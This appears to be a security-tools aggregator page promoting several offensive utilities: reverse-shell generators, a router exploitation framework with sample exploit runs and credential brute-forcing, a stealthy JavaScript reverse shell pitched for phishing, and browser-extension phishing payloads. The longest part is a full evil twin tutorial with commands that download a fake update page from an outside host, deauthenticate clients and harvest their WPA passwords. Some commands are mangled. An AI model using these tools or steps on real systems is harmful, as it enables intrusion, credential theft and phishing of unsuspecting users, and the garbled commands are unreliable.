An interactive reference tool to help security professionals utilize useful payloads and commands - Brosec

Brosec is a terminal based reference utility designed to help us infosec bros and broettes with useful (yet sometimes complex) payloads and commands that are often used during work as infosec practitioners. An example of one of Brosec's most popular use cases is the ability to generate on the fly reverse shells (python, perl, powershell, etc) that get copied to the clipboard.

Assuming the user has already set up the required variables (read on to learn how) a reverse shell using the awk command can be generated as easy as...

Payload Variables

Brosec allows you to store and retrieve values (in a local json db) for several variables in order to make command/payload generation easier. While some payloads will already include these variables, you can also include them in any payload that prompts for user input.

For example, the following shows how a Powershell download cradle can be generated using the LHOST and LPORT variables (the values of which had already been set).

Available variables

• LHOST : Local IP or name
• LPORT : Local IP or name
• RHOST : Remote IP or name
• RPORT : Remote IP or name
• USER : Username (only used in a few payloads)
• PROMPT : User Prompt (This isn't a stored value. Instead, payloads with this variable will prompt for input.)

Above are multiple examples of how to access and set the stored configuration variables.

• Configuration variables can be viewed via the config command at any time, or by entering the variable name
• Variables can be changed at any time by entering set <variable> <value>
• You can also navigate to frequently used payloads by entering the menu sequence from the command line: bros <sequence>
  • Ex: bros 413 - This would automate entering 4 for the Web Menu, 1 for the XXE sub menu, and 3 for the XXE local file read payload

Additional Features and Usage Examples

XXE for Bros

In addition to payloads such as reverse shells, Brosec also has multiple XXE payloads that you can generate on the fly.

Simple HTTP(s) Server

Need a quick web server? Forget python SimpleHTTPServer, bros has your back with bros http when entered via the command line. An SSL server? bros https has you covered.

Anonymous FTP Server

Need to exfiltrate some data via ftp? Bros comes with a handy bros ftp when entered via the command line. The ftp server accepts anonymous downloads/uploads from the CWD (so be careful when running).

Installation

Releases
Some features are unavailable in the compiled version, but is a good way to quickly try out Brosec

Manual installation

Mac

• brew install node netcat - Install Nodejs and netcat (nc or ncat will work too)
• git clone https://github.com/gabemarshall/Brosec.git - Clone Brosec repo
• cd Brosec && npm install - cd into the directory and install npm depdendencies

Kali Linux

• apt-get install npm build-essential g++ xsel netcat Install dependencies
• npm config set registry http://registry.npmjs.org/ Npm registry seems to be broken by default when installed from Kali repos
• npm install -g n Install n (nodejs version manager)
• n latest Install latest version of nodejs
• git clone https://github.com/gabemarshall/Brosec.git - Clone Brosec repo
• cd Brosec && npm install - cd into the directory and install npm depdendencies

Windows (Unsupported)

• Install nodejs
• Install ncat
• git clone https://github.com/gabemarshall/Brosec.git - Clone Brosec repo

Payloads that utilize netcat will not work due to the kexec library not being supported in Windows

Optional

Add bros directory path to your PATH env variable, create a symlink for the bros file, etc

Configuration

Brosec stores configuration values in a local json db file. The default storage location is /var/tmp, but can be changed by editing settings.dbPath variable in the settings.js file. Brosec also uses netcat for several payloads. If needed, the path to netcat can be altered via the settings.netcat variable (it can also be changed to ncat or nc).

Download Brosec

Read More

Payload generator that uses Metasploit and Veil - Payday

Payload generator that uses Metasploit and Veil. Takes IP address input and then builds payloads automatically. Calls Veil framework with supplied IP address and creates binaries and handlers. Uses msfvenom to create payloads and writes resource handler files in the same way that Veil does.

Examples:

Generate Metasploit Payloads

payday.py --msf --ip 1.1.1.1

Generate Veil Payloads

payday.py --veil --ip 1.1.1.1

Generate Both

payday.py --veil --msf --ip 1.1.1.1

Clean Out Directories

payday.py --clean

Specify custom output directory

payday --veil --msf --output /path/to/custom --ip 1.1.1.1

Clean custom output directory

payday --output /path/to/custom --clean

Download Payday

Read More

Router Exploitation Framework - RouterSploit

The RouteSploit Framework is an open-source exploitation framework dedicated to embedded devices.
It consists of various modules that aids penetration testing operations:

• exploits - modules that take advantage of identified vulnerabilities
• creds - modules designed to test credentials against network services
• scanners - modules that check if target is vulnerable to any exploit

Installation

sudo apt-get install python-requests python-paramiko python-netsnmp
git clone https://github.com/reverse-shell/routersploit
./rsf.py

Usage

root@kalidev:~/git/routersploit# ./rsf.py 
 ______            _            _____       _       _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_/ /___  _   _| |_ ___ _ __\ `--. _ __ | | ___  _| |_
 |    // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
 \_| \_\___/ \__,_|\__\___|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
     Router Exploitation Framework   |_|

 Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)
 Codename : Wildest Dreams
 Version  : 1.0.0

rsf > 

1. Exploits

Pick the module

rsf > use exploits/
exploits/2wire/     exploits/asmax/     exploits/asus/      exploits/cisco/     exploits/dlink/     exploits/fortinet/  exploits/juniper/   exploits/linksys/   exploits/multi/     exploits/netgear/
rsf > use exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) > 

U can use tab key for completion.

Options

Display module options:

rsf (D-LINK DIR-300 & DIR-600 RCE) > show options

Target options:


   Name       Current settings     Description                                
   ----       ----------------     -----------                                
   target                          Target address e.g. http://192.168.1.1     
   port       80                   Target Port

Set options:

rsf (D-LINK DIR-300 & DIR-600 RCE) > set target http://192.168.1.1
[+] {'target': 'http://192.168.1.1'}

Run module

Exploiting target can be achieved by issuing 'run' or 'exploit' command:

rsf (D-LINK DIR-300 & DIR-600 RCE) > run
[+] Target is vulnerable
[*] Invoking command loop...
cmd > whoami
root

It is also possible to check if the target is vulnerable to particular exploit:

rsf (D-LINK DIR-300 & DIR-600 RCE) > check
[+] Target is vulnerable

Info

Display information about exploit:

rsf (D-LINK DIR-300 & DIR-600 RCE) > show info

Name:
D-LINK DIR-300 & DIR-600 RCE

Description:
Module exploits D-Link DIR-300, DIR-600 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.

Targets:
- D-Link DIR 300
- D-Link DIR 600

Authors:
- Michael Messner <devnull[at]s3cur1ty.de> # vulnerability discovery
- Marcin Bury <marcin.bury[at]reverse-shell.com> # routersploit module

References:
- http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router
- http://www.s3cur1ty.de/home-network-horror-days
- http://www.s3cur1ty.de/m1adv2013-003

2. Creds

Pick module

Modules located under creds/ directory allow running dictionary attacks against various network services.
Following services are currently supported:

• ftp
• ssh
• telnet
• http basic auth
• http form auth
• snmp

Every service has been divided into two modules:

• default (e.g. ssh_default) - this kind of modules use one wordlist with default credentials pairs login:password. Module can be quickly used and in matter of seconds verify if the device uses default credentials.
  
• bruteforce (e.g. ssh_bruteforce) - this kind of modules perform dictionary attacks against specified account or list of accounts. It takes two parameters login and password. These values can be a single word (e.g. 'admin') or entire list of strings (file:///root/users.txt).

Console:

rsf > use creds/
creds/ftp_bruteforce         creds/http_basic_bruteforce  creds/http_form_bruteforce   creds/snmp_bruteforce        creds/ssh_default            creds/telnet_default         
creds/ftp_default            creds/http_basic_default     creds/http_form_default      creds/ssh_bruteforce         creds/telnet_bruteforce      
rsf > use creds/ssh_default
rsf (SSH Default Creds) > 

Options

rsf (SSH Default Creds) > show options

Target options:

   Name       Current settings     Description           
   ----       ----------------     -----------           
   target                          Target IP address     
   port       22                   Target port           


Module options:

   Name         Current settings                                                      Description                                              
   ----         ----------------                                                      -----------                                              
   threads      8                                                                     Numbers of threads                                       
   defaults     file:///root/git/routersploit/routersploit/wordlists/defaults.txt     User:Pass or file with default credentials (file://)

Set target:

rsf (SSH Default Creds) > set target 192.168.1.53
[+] {'target': '192.168.1.53'}

Run module

rsf (SSH Default Creds) > run
[*] Running module...
[*] worker-0 process is starting...
[*] worker-1 process is starting...
[*] worker-2 process is starting...
[*] worker-3 process is starting...
[*] worker-4 process is starting...
[*] worker-5 process is starting...
[*] worker-6 process is starting...
[*] worker-7 process is starting...
[-] worker-4 Authentication failed. Username: '3comcso' Password: 'RIP000'
[-] worker-1 Authentication failed. Username: '1234' Password: '1234'
[-] worker-0 Authentication failed. Username: '1111' Password: '1111'
[-] worker-7 Authentication failed. Username: 'ADVMAIL' Password: 'HP'
[-] worker-3 Authentication failed. Username: '266344' Password: '266344'
[-] worker-2 Authentication failed. Username: '1502' Password: '1502'

(..)

Elapsed time:  38.9181981087 seconds
[+] Credentials found!

Login     Password     
-----     --------     
admin     1234         

rsf (SSH Default Creds) > 

3. Scanners

Scanners allow quickly verify if the target is vulnerable to any exploits.

Pick module

rsf > use scanners/dlink_scan
rsf (D-Link Scanner) > show options

Options

Target options:

   Name       Current settings     Description                                
   ----       ----------------     -----------                                
   target                          Target address e.g. http://192.168.1.1     
   port       80                   Target port                                

Set target:

rsf (D-Link Scanner) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}

Run module

rsf (D-Link Scanner) > run
[+] exploits/dlink/dwr_932_info_disclosure is vulnerable
[-] exploits/dlink/dir_300_320_615_auth_bypass is not vulnerable
[-] exploits/dlink/dsl_2750b_info_disclosure is not vulnerable
[-] exploits/dlink/dns_320l_327l_rce is not vulnerable
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_rce is not vulnerable

[+] Device is vulnerable!
 - exploits/dlink/dwr_932_info_disclosure

It has been verified that target is vulnerable to dwr_932_info_disclosure exploit. Now use proper module and exploit target.

rsf (D-Link Scanner) > use exploits/dlink/dwr_932_info_disclosure
rsf (D-Link DWR-932 Info Disclosure) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}
rsf (D-Link DWR-932 Info Disclosure) > exploit
[*] Running module...
[*] Decoding JSON value
[+] Exploit success

   Parameter                  Value                                                                                                 
   ---------                  -----                                                                                                 
   get_wps_enable             0                                                                                                     
   wifi_AP1_enable            1                                                                                                     
   get_client_list            9c:00:97:00:a3:b3,192.168.0.45,IT-PCs,0>40:b8:00:ab:b8:8c,192.168.0.43,android-b2e363e04fb0680d,0     
   wifi_AP1_ssid              dlink-DWR-932                                                                                         
   get_mac_address            c4:00:f5:00:ec:40                                                                                     
   wifi_AP1_security_mode     3208,8                                                                                                
   wifi_AP1_hidden            0                                                                                                     
   get_mac_filter_switch      0                                                                                                     
   wifi_AP1_passphrase        MyPaSsPhRaSe                                                                                          
   get_wps_mode               0

Download RouterSploit

Read More

Reverse HTTP Shell Using JavaScript - JSRat

JSRat is a reverse HTTP Shell by using JavaScript. JSRat use rundll32.exe to load the JavaScript code in cmd and a HTTP Shell is returned when the code is executed. The special part is that after running the cmd command, rundll32.exe will remain in the background to continuously connect to the Server. No file is written to the disk during the whole process, which significantly enhances stealth.

Characteristics:

To reverse a shell by using cmd to execute codes

Advantages:

• It can avoid being killed
• It’s easy to use
• It’s relatively stealthy.

Exploitation:

Based its characteristics and advantages, using JavaScript as the phishing payload can achieve amazing effect.

Download JSRat

Read More

Script for searching the extracted firmware file system for goodies! - Firmwalker

A simple bash script for searching the extracted or mounted firmware file system.

It will search through the extracted or mounted firmware file system for things of interest such as:

• etc/shadow and etc/passwd
• list out the etc/ssl directory
• search for SSL related files such as .pem, .crt, etc.
• search for configuration files
• look for script files
• search for other .bin files
• look for keywords such as admin, password, remote, etc.
• search for common web servers used on IoT devices
• search for common binaries such as ssh, tftp, dropbear, etc.
• search for URLs, email addresses and IP addresses
• NOTE: Some of the data written to the file may be quite verbose. It that case, the data can be reviewed and then deleted if desired from the file.

Usage

• If you wish to use the static code analysis portion of the script, please install eslint: npm i -g eslint
• ./firmwalker {path to root file system} {path for firmwalker.txt}
• Example: ./firmwalker linksys/fmk/rootfs ../firmwalker.txt
• A file firmwalker.txt will be created in the same directory as the script file unless you specify a different filename as the second argument
• Do not put the firmwalker.sh file inside the directory to be searched, this will cause the script to search itself and the file it is creating
• chmod 0700 firmwalker.sh

How to extend

• Have a look under 'data' where the checks live or add eslint rules - http://eslint.org/docs/rules/ to eslintrc.json

Script created by Craig Smith and expanded by:

• Athanasios Kostopoulos
• misterch0c

Links

• https://craigsmith.net
• https://woktime.wordpress.com
• https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=Firmware_Analysis

Download Firmwalker

Read More

Extension Exploitation Framework - LynxFramework

LynxFramework is an operating tool for web browser offering a specialized service in the effect browser extension development , namely Google Chrome and Firefox soon. The operation is based on the script for the injection in the order to retrieve data targeted.

LynxFramework est un outil d'exploitation pour navigateur web vous proposant un service d'effet specialise dans le developpement d'extension pour navigateur, a savoir Google Chrome et prochainement Firefox. Le fonctionnement est base sur l'injection de script dans l'extension afin de recuperer des donnees ciblees.

 

LAST ONLINE PAYLOAD

XSSKeylooger	keylooger xss
ForceDownload	force file download
paytoweb	www.paytoweb.com
Paypal	https://www.paypal.com/signin/
Facebook	http://facebook.com

Download LynxFramework

Read More

Evil Twin Access Point tutorial - Kali-Linux

What is Evil twin access point??

Evil twin access point is a wireless access point that has been installed on a secure network without explicit authorization from a local network administrator, whether added by a well-meaning employee or by a malicious attacker.

To the user, the evil twin looks like a hotspot with a strong signal; that’s because the attacker has not only used the same network name and settings as the “good twin” he is impersonating, he has also physically positioned himself near the end-user so that his signal is likely to be the strongest within range.

If the end-user is tempted by the strong signal and connects manually to the evil twin to access the Internet, or if the user’s computer automatically chooses that connection because it is running in promiscuous mode, the evil twin becomes the user’s Internet access point, giving the attacker the ability to intercept sensitive data such as passwords.


Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you.


Step 1:

Login to your kali linux machine.
Establish an internet connection to your host machine.
Now we have to install DHCP server as follows.

Open the terminal and type apt-get install dhcp3-server as show below:

Step 2:

Now we need to configure our DHCP server as below.
Open your terminal and type nano/etc/dhcpd.conf, you should have a blank file opened up on your terminal.

Now type the following shown on the screen shot below

After typing press ctrl+x and then press y and hit enter to save it.


Step 3:

Now download the security update page which the client will see when they open up the web browser.

To do that,

Navigate to, cd /var/www in your terminal and do as follows:

rm index.html
wget http://hackthistv.com/eviltwin.zip
unzip eviltwin.zip
rm eviltwin.zip

Now type the following to start your apache server and mysql:


 /etc/init.d/apache2 start
/etc/init.d/mysql start

Now the mysql is loaded now we have to create a database where we store the WPA/WPA2 password that the client enters into the security update page.

Type the follows:

                mysql -u root
       create database evil_twin;
       use evil_twin

       create table wpa_keys(password varchar(64), confirm                  varchar(64));

In the above screenshot the databse already exists.


Step 5:


Now we need to find our local network adapter interface name and our local ip

Now open the new terminal and type:

ip route (take note of local ip n wired interface)
airmon-ng
airmon-ng start wlan0
clear

NOTE: eth0 is my interface name and 192.168.0.105 is my local ip


airodump-ng-oui-update

airodump-ng -M mon0 (take note of target essid,bssid and channel number)
airbase-ng -e [ESSID] -c [ch. #] -P mon0
NOTE: [ESSID]  is your targets ESSID and [ch. #] targets channel no.

Step 6:

Our evil twin access point is now up and running, we need to configure our tunnel interface so we can create a bridge between our evil twin access point and our wired interface and our tunnel interface is named at0, which was created when we created evil twin access point using airbase..

Don’t close airbase and mysql terminal.

Now open a new terminal and type as follows:

ifconfig at0 192.168.1.129 netmask 255.255.255.128

now we need to add a routing table to enable IP forwarding so we can forward traffic to and fro from our evil twin access point..

so,type the following:

route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE
iptables –append FORWARD –in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to-destination [LOCALIP ADDRESS:80]
iptables -t nat -A POSTROUTING -j MASQUERADE
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
etc/init.d/isc-dhcp-server start

Step 7:

Now we need to force our clients to connect to our evil twin access point and to accomplish this we need to disconnect the clients by performing the de-authentication attack. To do that first we need to create the blacklist file that contains BSSID of the target.

Do as follows:

echo [BSSID] > blacklist
NOTE:[BSSID] BSSID of the target
mdk3 mon0 d -b blacklist -c [CH.#]

Now go back to airbase terminal to check if any client has connected to your evil twin access point.


If he is connected to the evil twin access point he will see the security page as shown below which asks for password.

Where the client enters his WPA/WPA2 password and clicks on update.

Now go over to the mysql terminal and type

use evil_twin
select * from wpa_keys; {To view the password entered by the victim in our mysql database}

you have successfully harvested the WPA passphrase right from the victim in plain text.

now close all the terminal windows and connect back to the real AP to check whether the password is correct or victim was him/herself was a hacker and tricked you. 


Although you don’t need to name any AP similar to an existing AP you can also create a random free open WiFi type name to gather the client on your AP and start pentesting.


Source: codingsec

By OffensiveSec

Read More

Portable Penetration Testing Distribution for Windows Environments - PentestBox 2.0

PentestBox provides all security tools as a software package, eliminating requirement of Virtual machines or dualboot environments on Windows Operating System.

It is created because more than 50% of penetration testing distribution users uses windows. [Source]

So it provides an efficient platform for Penetration Testing on windows platform.

There are two variants of PentestBox, one without Metasploit and other one with Metasploit.

Antiviruses and Firewalls needs to be switched off to install and operate the version with Metasploit.

Download any of the variant by clicking respective download button present on the right side.

By default installer extract to C:/PentestBox/, and for its proper functioning do not make any changes.

Easy To Use

It is a commandline utility which is all what you want. You can get to know about the commands on tools.pentestbox.com.

Awesome Design

It is the same green font on black terminal but in an modern way.

Best Performance

PentestBox directly runs on host machine instead of virtual machines, so performance is obvious.

No Dependencies Needed

All the dependencies required by tools are inside PentestBox, so you can even run PentestBox on freshly installed windows without any hassle.

Portable

PentestBox is entirely portable, so now you can carry your own Penetration Testing Environment on a USB stick. It will take care of dependencies required to run tools which are inside it.

Linux Environment

PentestBox contains nearly all linux utilities like bash, cat, chmod, curl, git, gzip, ls, mv, ps, ssh, sh, uname and others. It even contains your favourite text editor "vim". For complete list, please look at tools.pentestbox.com/#linux-utilities.

Because of this most of the pentesting tools which were earlier compatible only with Linux are working smoothly in PentestBox.

No Drivers Issue

Windows has already large support of drivers for Graphic Card and wireless. So now you don't have to worry about drivers compaitability issues. For Example now you can use your GPU power to crack hashes using Project RainbowCrack which is particularly not compaitable on linux environment.

Modular

In the making of PentestBox we have included only the best tools , but in that process we have missed some tools which you might want to use. In that case you can easily install those tools using toolsmanager present inside PentestBox, it can install/update/Uninstall tools which are not there in PentestBox.

Less Memory Usage

PentestBox runs on host machine without any need for virtual machine. So it only need's 20 MB for launching compared to atleast 2GB of RAM need for running virtual machine distributions.

Less Disk Usage

It is very light on Disk as well, it only acquires less than third of linux pentesting distro do.

InBuilt Browser

PentestBox contains a version of Mozilla Firefox Browser with nearly all security addons. To know the complete list of addons, please click here.

Cool Update Feature

It contains an update feature through which you can keep your tools updated. To know more about update feature, please click here.

Can be shared on a network

Consider a environment where you want to use PentestBox on many computers like office, lab, etc. Instead of installing PentestBox on each and every computer, you can just install that on one computer and share that folder as a drive to other computers on the same network. Check about this feature here.

Download PentestBox 2.0

Read More